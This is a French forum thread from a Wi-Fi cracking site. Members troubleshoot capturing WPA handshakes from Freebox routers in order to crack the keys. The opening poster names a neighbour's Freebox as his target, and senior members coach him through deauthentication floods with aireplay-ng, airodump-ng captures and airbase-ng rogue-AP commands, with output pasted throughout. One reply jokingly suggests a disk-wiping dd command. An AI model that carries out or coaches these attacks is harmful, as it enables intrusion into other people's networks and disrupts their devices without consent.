Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 22-07-2014 13:59:54

-Fana-
Nouveau membre
Lieu : In hell

Impossible d'obtenir handshake sur freebox

Bjr tout le monde,

Pas tapay pas tapay pour ce énième topic sur le sujet...

J'explique. je test les méthodes de crack wpa suite à la vue de ces deux tutos :
Crack de clé WPA sous Backtrack 2
Cracker clés wifi wep, wpa/wpa2 avec wifite sous kali linux (voir la vidéo).

Je suis sous kali linux 1.0.7 et je bosse tout ca sur deux box :
- LiveBox 3 (de m.... sauf pour le wps qui a l'air pas mal protégé xD) : la mienne donc
- FreeBox v6 : celle de ma voisine (merci :))

Voilà le décors est planté je continue.
Avant de commencer, je lance deux commandes pour libérer de tout process ma carte réseau sinon impossible de capturer un handshake quel qu'il soit (je le cite au cas ou mais je pense pas que le problème vienne de là).

service network-manager stop

puis

airmon-ng check kill

Premier test : LiveBox V3
Que ce soit avec wifite ou airodump-ng+aireplay-ng, j'arrive à obtenir un handshake. Wifite me le pond après une ou deux deauth. Avec Aireplay, je m'y reprends à deux trois fois en envoyant entre 1 à 3 deauth mais ca passe assez facilement aussi.

Deuxième test : la Freebox
Là, c'est le drame. Impossible d'obtenir ce DFGKL%MSKDFLMZKFSMLDf de handshake et je ne parle pas du crack avec le dico derrière hein, juste ce foutu handshake.

Le signal est bon, tellement bon d'ailleurs qu'il a une valeur quasi identique a ma livebox .... qui est à 1m02 de moi oO.
Donc je me pose des questions mais je préfèrerais avoir des réponses :D

Réponse A : Il y a un protocol en carton qui fait bloquer le schmilblik quelque part.

Réponse B : Je suis suffisement proche pour capter le signal de la box mais trop loin pour capter le signal des clients connectés (si oui bizarre que les clients soit détecté au scan et pour l'envoi de la deauth mais que ca pose problème pour le reste non ?).

Réponse C : les forces de l'univers ne veulent pas que j'obtienne le handshake d'une FreeBox.

Réponse D : La réponse D

Que dire de plus....j'ai galéré deux trois jours le temps d'apprendre un peu et obtenir le handshake de ma livebox o/ . J'aimerais au moins comprendre pourquoi ca passe pas sur la freebox et si on peut passer au dessus histoire de pas chercher des jours entiers si c'est tout simplement impossible ^^.

EDIT :
Un petit oublie histoire d'éliminer une piste. J'ai aussi essayé d'activer certaines options au démarrage de wifite. Bon j'avoue je suis pas encore trop sûr de quoi fait quoi. En gros, je sais pas si ces options aident dans la capture du handshake ou dans le décryptage de la clé mais bon ca coutait rien d'essayer

wifite -aircrack -pyrit -tshark -cowpatty -strip

Mais le résultat reste le même ...

Dernière modification par -Fana- (22-07-2014 14:56:17)

"Toute technologie suffisamment avancée est indiscernable de la magie." Arthur C. Clarke
"Piratez la planète, PIRATEZ LA PLANETE" Cereal Killer, ZeroCool, ...
"Tout à coup, j'ai l'impresion d'être dieu" Cereal Killer
"Si tout les connards avaient un point rouge sur le front, la terre, vue du ciel, ressemblerait à un grand champ de coquelicot"

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 22-07-2014 16:16:46

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Re : Impossible d'obtenir handshake sur freebox

-Fana- a écrit :
kcdtv a écrit :

Premier conseil : n'utilises pas wifite et fais le en ligne de commande, c'est toujours mieux. wink
je déplace ton thème dans captures de handshake vu que c'est un problème de capture de handshake.
Quel chipset utilises-tu?

Heuu ba en faite je l'avais mit la parce que c'est avant de lancer la capture du handshake xD mais c'est comme tu veux ^^
Du coup pour les lignes de commandes je suis plutot d'accords, mais comment dire, je tape wifite dans le shell et tout se passe dans le shell ^^ ... et de ttes, j'ai le même prob avec airodump donc je pense pas que ca vienne de ca non plus.

Pour le chipset, si tu parles de ma carte wifi, je tourne DWA-510 (d-link)

Certes , wifite c'est un script en python et ça se passe en console, mais tu n'as aucune idée sur les paramètres employés, aucune possibilité d'affiner ton attaques. wink

Donc si "ça ne marche pô" avec wifite, la première chose à faire et de passer à la ligne de commande en essayant différentes syntaxes.
et tu pourras du coup non seulement travailler ta syntaxe avec aireplay-ng mais aussi ajouter un rogue AP avec airbase, utiliser mdk3 etc...

Pour le chipset je ne parle pas de la carte wifi mais du chipset...

un simple

airmon-zc

suffit

EDIT :
Un petit oublie histoire d'éliminer une piste. J'ai aussi essayé d'activer certaines options au démarrage de wifite. Bon j'avoue je suis pas encore trop sûr de quoi fait quoi. En gros, je sais pas si ces options aident dans la capture du handshake ou dans le décryptage de la clé mais bon ca coutait rien d'essayer

Ne crois tu qu'il vaudrais mieux savoir ce que tu fais / comprendre  au lieu d'ajouter des trucs sans savoir ce que c'est ...
essaye avec

dd truchmuc sda

Ne le fait pas , c'est une blague wink

Le signal est bon, tellement bon d'ailleurs qu'il a une valeur quasi identique a ma livebox .... qui est à 1m02 de moi oO.

C'est trop près, tu dois être à une distance qui te permette de recevoir correctement la box et le client, en ettant à un mèttre 20 tu sature ta carte avec le signal du PA, essaye au contraire de t'éloigner un peu

Réponse B : Je suis suffisement proche pour capter le signal de la box mais trop loin pour capter le signal des clients connectés (si oui bizarre que les clients soit détecté au scan et pour l'envoi de la deauth mais que ca pose problème pour le reste non ?).

possible...

ce qu'il faudrait c'est que tu présente à l'aide de captures d'écran ou de copié collés ( en éditant les ssid et bssid ) ce qui se passe exactement

- copié-collé ou capture d'écran de ta console airodump-ng
- copié-collé ou capture d'écran de ta consola aitreplay-ng
- copié-collé ou capture d'écran de ta airmon

#3 22-07-2014 17:34:56

koala
Membre d'honneur
Lieu : In the sky

Je confirme que les freebox sont un peu plus dur a travailler pour le handshake MAIS wink plein d'outils sont a ta disposition comme le souligne Kcdtv.N'essai pas une deauth brutal mais plus fine et si ça marche toujours pas airbase est ton allié tongue

Dernière modification par koala (22-07-2014 17:35:08)

#4 22-07-2014 18:01:29

-Fana-
Nouveau membre

kcdtv a écrit :

Certes , wifite c'est un script en python et ça se passe en console, mais tu n'as aucune idée sur les paramètres employés, aucune possibilité d'affiner ton attaques.

Oui c'est sur dit comme ca ^^ m'enfin comme tu as pu le voir dans mon autre post, j'ai aussi essayé avec la méthode classique (airodump etc, ...). il est vrai que je parle de wifite mais de tte, c'est la même chose avec les deux méthodes (pour le moment en tout cas xD

A propos du chipset, c'est vague il y en a pleins le pc xD. Je l'avais déjà vu écrit quelque part en plus mais bon de la à m'en souvenirs...du coup mieux avec la commande :

Ralink corp. RT2561/RT61 rev B 802.11g

Ah oui je me souviens, c'était avec mes premiers test sous BT2 que j'avais un ra0 et non un wlan0, j'avais du chercher brièvement pourquoi xD

kcdtv a écrit :

Ne crois tu qu'il vaudrais mieux savoir ce que tu fais / comprendre  au lieu d'ajouter des trucs sans savoir ce que c'est ...
essaye avec

dd truchmuc sda

Ne le fait pas , c'est une blague wink

NON JE NE SAUTERAI PAS DU PONT SI TU ME LE DIS ! lol
Autant pour moi

wifite a écrit :

-aircrack verify handshake using aircrack [on]
-pyrit verify handshake using pyrit [off]
-tshark verify handshake using tshark [on]
-cowpatty verify handshake using cowpatty [off]

Ca aussi c'est du vague...enfin pour moi. Beaucoup de chose à lire et a apprendre encore xD
Du coup ce que je sais pas surtout c'est a quel moment ca vérifie le handshake, au moment de la capture ou du décryptage...mais je te rassure je m'attendais pas a ce que ca me fasse un café wink

kcdtv a écrit :

C'est trop près, tu dois être à une distance qui te permette de recevoir correctement la box et le client, en ettant à un mèttre 20 tu sature ta carte avec le signal du PA, essaye au contraire de t'éloigner un peu

Alors tu as du mal me comprendre la dessus ^^ mon pc est a 1m de la Livebox, celle dont j'arrive a obtenir le handshake. La freebox est deux étage en dessous (celle dont je n'ai pas le handshake donc) mais la plupart du tps, j'ai a peu prêt le même power pour les deux (60db plus ou moins) oO

Pour le reste, laisse moi le tps de repasser sur l'autre pc et de faire tout ca..je ferai une édit dès que c'est fait ^^

_@_;"
EDIT:
_@_;"
Alors voici les infos (en esperant poster les bonnes xD)

[email protected]:~# airodump-ng --encrypt wpa mon0

CH 12 ][ Elapsed: 28 s ][ 2014-07-22 19:40                                         

BSSID            PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

YY:YY:YY:YY:YY:YY  -63       19        3    0  13  54e. WPA2 CCMP   PSK  maUber-Livebox
XX:XX:XX:XX:XX:XX  -55       22        4    0   7  54e  WPA  CCMP   PSK  laFreebox-deMort

BSSID              STATION            PWR   Rate    Lost    Frames  Probe                            

(not associated)   oO:oO:oO:oO:oO:oO  -47    0 - 1      0        3  
YY:YY:YY:YY:YY:YY  sY:sY:sY:sY:sY:sY  -53   54 -54      0      148                                  
XX:XX:XX:XX:XX:XX  SX:SX:SX:SX:SX:SX  -47    0 - 1e     0        5         

Note : j'avais pas encore vu le "not assigned" oO why xD. un moment dans le probe, il est même apparut l'ESSID de l a freebox,. puis 20 secondes après, plus rien dans le probe mais je voyais deux "not associated". Bref pas important mais j'aime bien comprendre xD

[email protected]:~# airodump-ng -w freebox --encrypt wpa -c 7 --bssid F4:CA:E5:F3:08:00 mon0

CH  7 ][ Elapsed: 1 min ][ 2014-07-22 20:27                                         

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

XX:XX:XX:XX:XX:XX  -45  35      811      175    0   7  54e  WPA  CCMP   PSK  laFreebox-deMort      

BSSID              STATION            PWR   Rate    Lost    Frames  Probe                           

XX:XX:XX:XX:XX:XX  S1:S1:S1:S1:S1:S1  -59    0 - 1      0       10                                   
XX:XX:XX:XX:XX:XX  S2:S2:S2:S2:S2:S2  -67    0 - 6      1       56                                   
XX:XX:XX:XX:XX:XX  S3:S3:S3:S3:S3:S3  -79    0 - 5e     0      122
[email protected]:~# aireplay-ng -0 5 -a XX:XX:XX:XX:XX:XX -c S3:S3:S3:S3:S3:S3 wlan0

20:39:19  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 7
20:39:20  Sending 64 directed DeAuth. STMAC: [S3:S3:S3:S3:S3:S3] [19|71 ACKs]
20:39:20  Sending 64 directed DeAuth. STMAC: [S3:S3:S3:S3:S3:S3] [ 4|64 ACKs]
20:39:21  Sending 64 directed DeAuth. STMAC: [S3:S3:S3:S3:S3:S3] [ 0|64 ACKs]
20:39:21  Sending 64 directed DeAuth. STMAC: [S3:S3:S3:S3:S3:S3] [ 0|64 ACKs]
20:39:22  Sending 64 directed DeAuth. STMAC: [S3:S3:S3:S3:S3:S3] [ 0|18 ACKs]

Voilà chef !

Dernière modification par -Fana- (22-07-2014 19:52:11)

"Toute technologie suffisamment avancée est indiscernable de la magie." Arthur C. Clarke
"Si tout les connards avaient un point rouge sur le front, la terre, vue du ciel, ressemblerait à un grand champ de coquelicot"

#5 22-07-2014 20:03:53

-Fana-
Nouveau membre

Koala a écrit :

Je confirme que les freebox sont un peu plus dur a travailler pour le handshake MAIS wink plein d'outils sont a ta disposition comme le souligne Kcdtv.N'essai pas une deauth brutal mais plus fine et si ça marche toujours pas airbase est ton allié tongue

Moi brutal ? c'est pas mon genre xD.
Na puis les toutes première tentative je devais attendre qu'une vingtaine de deauth se fasse avant de couper le bazarre puis j'ai lu par ci par la qu'il en fallait pas bcp et hier j'suis carrement tomber sur un lien qui explique que en théorie 1 ca suffit (je crois que c'était sur la doc de base tout en anglais bref...)
Pour airbase, pas encore vraiment regarder ... vous citer pleins de trucs partout aussi la namého. je passe des heures à lire depuis trois jours...toutes mes journées presque xD
Et sinon, en quoi et à cause de quoi elles sont plus dur à travailler pour le handshake les freebox ? Remarque le faite qu'on en parle ici est déjà une preuve en soit en tout cas xD

#6 22-07-2014 20:14:36

koala
Membre d'honneur

Et sinon, en quoi et à cause de quoi elles sont plus dur à travailler pour le handshake les freebox ? Remarque le faite qu'on en parle ici est déjà une preuve en soit en tout cas xD

J'étais chez free avant et elle avait tendance a ignorer le surplus de requetes, peut-etre que la réponse est dans le firmware wink

#7 22-07-2014 21:09:16

Fab955
Membre Irremplaçable

Salut Fana, pourrais-tu, en fin si tu le désire bien sur, contribuer au partage de ta clef par défaut et les infos de ta livebox play?

On à très peu d'info sur celle-ci. J'ai ouvert un topic à ce sujet ou tu retrouvera les infos de la mienne.

Bien sur, cela est sans obligation et n'aura aucun impact sur ta bienvenue sur le forum wink

Bonne soirée à tous.

Dernière modification par Fab955 (22-07-2014 21:10:19)

#8 22-07-2014 21:55:57

-Fana-
Nouveau membre

[HORS SUJET]
@Fab955 : je suppose que ton topic c'est celui-ci ? :p
Pour la clé j'hésite car je l'utilise tjr vu que je la trouvais très bien cette clé de 26car en hexa xD M'enfin tu me diras je peux en mettre une autre lol. A part ca, oui je pourrais te filer des infos si ca peut vous faire avancer mais une chose à la fois ^^ (oui j'ai un DOS embarqué, une chose à la fois mais ca marche xD)
[/HORS SUJET]

#9 24-07-2014 15:16:31

-Fana-
Nouveau membre

UP
Salut tout le monde,
bon et bien je comprends pas tout là oO

Hier, je me suis fait un petit plaisirs histoire de changer un peu ... je me suis installé un p'tit compiz  (à l'aide de ce tuto) xD Je sais ca sert à rien (ou presque) m'enfin l'effet reste sympa ^^

Et puis hier soir, je re-essaye d'avoir ce foutu handshake et après 5mn de tentative, poupouf magie le handshake est apparue oO (avec airodump-ng + aireplay-ng). De plus, je n'ai apparement plus le problème que j'avais cité dans mon autre post. oO

Voilà. Je suis content que ca marche, mais c'est frustrant de pas comprendre. Est-ce que l'installation de certains paquets a pu résoudre le problème ?
Je me suis demandé aussi si les stations ou j'envoyais les deauth au début n'étaient pas des terminaux style android ou iphone etc, ...
J'ai vérifié le placards mais il n'y a pas de petit farfadet ou autres créature improblable qui a pu résoudre mon problème pdt que je dormais ><

Si quelqu'un trouve le fin mot de l'histoire, ca pourrait tjr servir, à défaut ca me permettrait de comprendre ^^. Dans l'attente, je m'attaque aux dictionnaires même si je pense que c'est peine perdu . J'crois que je vais expérimenter les rogues ap now :p
Dans tout les cas, merci d'avoir prit le tps de lire mes romans wink

Dernière modification par -Fana- (24-07-2014 15:18:21)

#10 02-10-2014 10:52:55

sukawa2007
Membre

Bonjour a tous,
Voila un moment que je n'étais pas venu ( plus le temps ) mais je me suis remis en selle car j'ai justement voulu tester la sécurité de ma Freebox V6 et je me retrouve dans le cas de bon nombre d'entre vous a savoir : Impossible d'obtenir ce satané hash.... Voici la procedure que j'ai suivi:
J'ai installé KALI sur mon pc ( je ne parle pas d'une install sous virtual box mais bien d'une install pur et dur sur mon HDD) et j'ai fais toutes les MAJ.

-airmon-ng start wlan0 ====> mon0

-airodump-ng --write NOM-DU-FUCHIER --channel LE-CHANNEL --bssid LE-BSSID-DE-MA-FREEBOX mon0 =====> Ca fonctionne, je ne vois que ma freebox et les clients qui y sont connecté.

-aireplay-ng -0 5 -a <BSSID> -c <ESSID> mon0 =====> La deauth fonctionne, ma victime se deconnecte bien puis se reconnecte au bout de quelques secondes.

J'ai relancé aireplay plusieurs fois et cibler une a une toutes les machines qui y étaient connecté.
Voila maintenant 12H que airodump tourne et je n'ai toujours pas de hanshake.

Voici ce que airodump m'affiche:

CH1 ] [ Elapsed: 12 hours 11mins ] [2014-10-02

BSSID                   PWR     RQX   Beacons     #Data,  #/s   CH     MB   ENC   CIPHER    AUTH    ESSID

F4:CA:00:05:A5      -67       80       404756    142454    6      1    54e   WPA    CCMP     PSK       FREEBOX

Toutes les stations connectés ont une valeur du PWR comprise ente 65 et 70 et parfois meme un peu au dessus.

J'ai essayé d'utiliser airebase-ng  comme conseillé dans un autre topic mais sans plus de resultat.. Voici la commande utilisé:

airbase-ng -a F4:CA:00:05:A5 --client 00:1E:65:11:AA:80 mon0.

Je commence a croire que cette box est incassable smile sad

Ah oui j'oubliais, un detail: je travaille dans l'informatique et mon appartement se situe juste au dessus de mon magasin. Donc toute  la journée des pc entre et sortent et la moitié se connect en WIFI. Donc en theorie, je ne devrais meme pas avoir besoin de lancer de deauth sur une machine, le handshake devrais apparaitre tout seul.

J'espere avoir été assez claire dans mes explications et que vous pourrez m'aider a comprendre.

A bientot smile

#11 02-10-2014 20:00:46

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Quel chipset utilises-tu?
Si tu pouvais coller le retour de airmon-zc wink

airmon-zc

vérifie tout de même tes ficheir cap avant de dire que tu n'as pas le handshake

aircrack-ng *.cap

pourrais tu nous faire des copié collé du retour des desauthentifications?
5 paquets de des-authentification ce n'est pas beaucoup...

#12 03-10-2014 15:53:36

koala
Membre d'honneur

Mmmh

airbase-ng -a F4:CA:00:05:A5 --client 00:1E:65:11:AA:80 mon0

Ce n'est pas une commande fiable, essai

airbase-ng -c $lecanalduréseau -e $lenomduréseau -a $sonbssid mon0

Le membre en question n'a pas re posté donc peut-etre que ça a marché pour lui.

Trouvé sur un ancien sujet pour le meme problème que toi (merci au moteurs de recherche en cas de trou de mémoire fréquent pour un plantigrade souvent trop perché dans son arbre bigsmoke )

Antares y dit aussi:

Antares145 a écrit :

Rassure-moi, pour l'option "-c client" tu utilises bien l'adresse d'une AUTRE machine présente sur le réseau, pas de ta machine d'attaque ? Évidemment, il faut qu'il y ait une autre machine présente sur le réseau roll
Est-ce que l'autre client est à portée directe de ta machine d'attaque ? Tu as quelle valeur de PWR pour ce client dans Airodump ?
Autre chose : parfois le handshake est capturé mais Airodump ne s'en rend pas compte. Quand tu penses en avoir un, essaie de lancer le crack sur ton fichier .cap et regarde si lui il trouve un handshake

Voir: Crack WPA2

Ps: pour une raison que j'ignore, sous Freebox V6 lors d'une utilisation un peu trop intensive de airbase-ng, la box change de canal toute seule.

Donc vérifies bien airodump de temps en temps cool

#13 03-10-2014 20:15:23

sukawa2007
Membre

Re-coucou,

Kcdtv Voici le copier collé du chip:

phy0    wlan0        rtl8192se    Realtek Semiconductor Co., Ltd. RTL8191SEvB (rev 10)

Je n'ai pas controlé avec aircrack de controler le hanshake... je sais, je suis un boulet.

Koala: Je suis déja tombé sur la discussion que tu m'as indiqué et d'ailleur elle m'a un peu servi smile
Pour ce qui est du canal, j'ai deja controlé et non il ne bouge pas...

Par contre j'ai lu quelque part qu'un defaut dans le firmware de la freebox etait a l'origine du probleme que nous rencontrons mais que free ne l'aurais jamais corrigé car Il ne pose que tres peu  voir pas de soucis pour les utilisateurs lambda...
Tu aurais des infos ou des echos la dessus?

Apres avoir relancé tout sa. voici une copie de deauth:

[email protected]:~# aireplay-ng -0 30 -a F4:CA:E5:A0:3D:D8 -c 94:D7:71:8F:10:7D mon0
21:36:50  Waiting for beacon frame (BSSID: F4:CA:E5:A0:3D:D8) on channel 1
21:36:50  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:50  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:51  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:51  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:52  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:52  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:53  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:54  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:54  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:55  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:55  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:56  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:56  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:57  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:57  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:58  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:58  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:59  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:36:59  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:37:00  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:37:00  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:37:01  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:37:01  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:37:02  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:37:02  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:37:03  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:37:03  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:37:04  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:37:05  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]
21:37:05  Sending 64 directed DeAuth. STMAC: [94:D7:71:8F:10:7D] [ 0| 0 ACKs]

J'ai relancé cette manip 4 fois...

Comme vous pouvez le voir, rien de concluant une fois de plus... sad

Dernière modification par sukawa2007 (03-10-2014 20:41:10)

#14 03-10-2014 21:40:48

Furyo
Membre Irremplaçable
Site Web

Quel est le client sur lequel tu appliques ta desauthification?

Si c'est un telephone, tu peux oublier...

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#15 03-10-2014 22:13:54

sukawa2007
Membre

J'ai tenté avec un téléphone ( Sony U10i ), une tablette Android, et un pc sous windows.

Les téléphones et smartphones ne répondent pas au même règle que les pc?

#16 03-10-2014 22:36:00

nubkratos
Nouveau membre

J'ai réussi sur une Freebox V6 en deauthifiant un iPhone au bout d'une centaine d'essaie (environ).

Par contre "[ 0| 0 ACKs]" ça sent pas bon.. j'avais le meme probleme avec ma awus036nhr ( chipset rtl8188ru), et apres avoir lu sur differents forum que la carte capturait que dalle, j'ai changé pour une awus036h ( chipset rtl8187l) et la tout  a changé .

#17 05-10-2014 07:45:51

sukawa2007
Membre

Bon je reviens vers vous car tout fonctionne ne nouveau normalement depuis le remplacement de ma carte wifi qui était a l'origine de mes probleme.

Maintenant je passe a la phase décryptage qui je le pense me reserve
quelques surprises smile

Merci pour votre aide et a bientot

#18 01-05-2015 19:43:06

sebsola
Nouveau membre

Salut ! Je met un UP sur ce sujet car j'ai le même probleme et je n'arive pas a capturer ce foutu handshack !!!
Si quelqu'un a une solution je suis preneur ! wink

#19 10-05-2015 08:24:02

NE5corail
N00b

Malheureusement, je ne peux pas t'aider.

Annonce